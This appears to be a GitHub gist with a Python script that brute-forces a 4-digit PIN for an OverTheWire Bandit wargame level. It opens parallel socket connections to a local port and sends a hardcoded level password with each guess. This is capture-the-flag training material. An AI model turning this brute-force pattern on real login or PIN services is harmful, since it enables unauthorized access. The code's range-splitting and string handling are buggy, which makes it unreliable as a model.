Created
October 1, 2020 07:03
-
-
Save elimence/1007a674d02ad45c97a0cf9633d7bbba to your computer and use it in GitHub Desktop.
Python script to brute force a 4 digit pass - bandits.overthewire
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding: utf-8 | |
# Python script to bruteforce a 4 digit pass - bandits.overthewire | |
import multiprocessing as mp | |
import socket | |
import time | |
import math | |
import sys | |
import os | |
class Connection: | |
def __init__(self, pin = 0, max_iter = 10000, sock = None): | |
print('initizializing socket instance ...') | |
self.pin = pin | |
self.max_iter = max_iter | |
self.password = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ' | |
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
def p_name(self): | |
return mp.current_process().name | |
def connect(self, host='127.0.0.1', port=30002): | |
print(self.p_name(), 'connecting ...', host, port) | |
self.sock.connect((host, port)) | |
print(self.p_name(), 'connection successful.') | |
def write(self, msg): | |
print(self.p_name(), 'sending', msg) | |
self.sock.sendall(msg) | |
def read(self): | |
print(self.p_name(), 'reading data ...') | |
data = self.sock.recv(4096) | |
return data | |
def close(self): | |
try: | |
self.sock.shutdown(0) | |
self.sock.close() | |
except: | |
pass | |
def execute(self, child_sig_term, prnt_sig_found): | |
start_time = time.time() | |
print(self.p_name(), 'exeuting attack ...') | |
self.connect() | |
self.write('greetings !') | |
welcome_str = self.read() | |
print(welcome_str) | |
while self.pin < self.max_iter: | |
if child_sig_term.is_set(): | |
break | |
pin_str = str(self.pin).zfill(4) | |
message = self.password + " " + pin_str + "\n" # add newline char to flush message or it doesn't get sent | |
self.write(message.encode()) | |
received_msg = self.read() | |
if 'Wrong' in received_msg: | |
print(self.p_name(), 'Wrong guess %s', pin_str) | |
else: | |
print('found', received_msg) | |
prnt_sig_found.set() | |
break | |
self.pin += 1 | |
time.sleep(0.5) | |
end_time = time.time() | |
total_time = end_time - start_time | |
print(self.p_name(), "start: "+str(self.pin), ' end: '+str(self.max_iter), 'total_time: ', str((total_time)/60) + ' minutes') | |
def main(): | |
print('main') | |
connections = [] | |
processes = [] | |
# requires read/write access to /dev/shm | |
prnt_sig_found = mp.Event() | |
child_sig_term = mp.Event() | |
MAX_ITER_COUNT = 10000 | |
processor_count = mp.cpu_count() | |
step_count = int(math.floor(MAX_ITER_COUNT / processor_count)) # math.floor returns a float in python 2 | |
end = step_count | |
start = 0 | |
print('Initial values ->', processor_count, step_count, start, end) | |
try: | |
for i in range(processor_count): | |
conn = Connection(pin = start, max_iter = end) | |
proc_name = 'BF[ ' + str(start) + ' - ' + str(end) + ' ]' | |
process = mp.Process(name=proc_name, target=conn.execute, args=(child_sig_term, prnt_sig_found)) | |
process.daemon = True | |
connections.append(conn) | |
processes.append(process) | |
start = end + 1 | |
end += start + step_count | |
# ensure start and end don't exceed max | |
if MAX_ITER_COUNT < end : end = MAX_ITER_COUNT | |
if MAX_ITER_COUNT < start: start = MAX_ITER_COUNT | |
# start all processes | |
for process in processes: | |
process.start() | |
# wait for all processes to finish | |
# block the main program until these processes are finished | |
for process in processes: | |
process.join() | |
prnt_sig_found.wait() | |
child_sig_term.set() | |
except: | |
pass | |
finally: | |
for conn in connections: | |
conn.close() | |
for process in processes: | |
if process.is_alive(): | |
process.terminate() | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment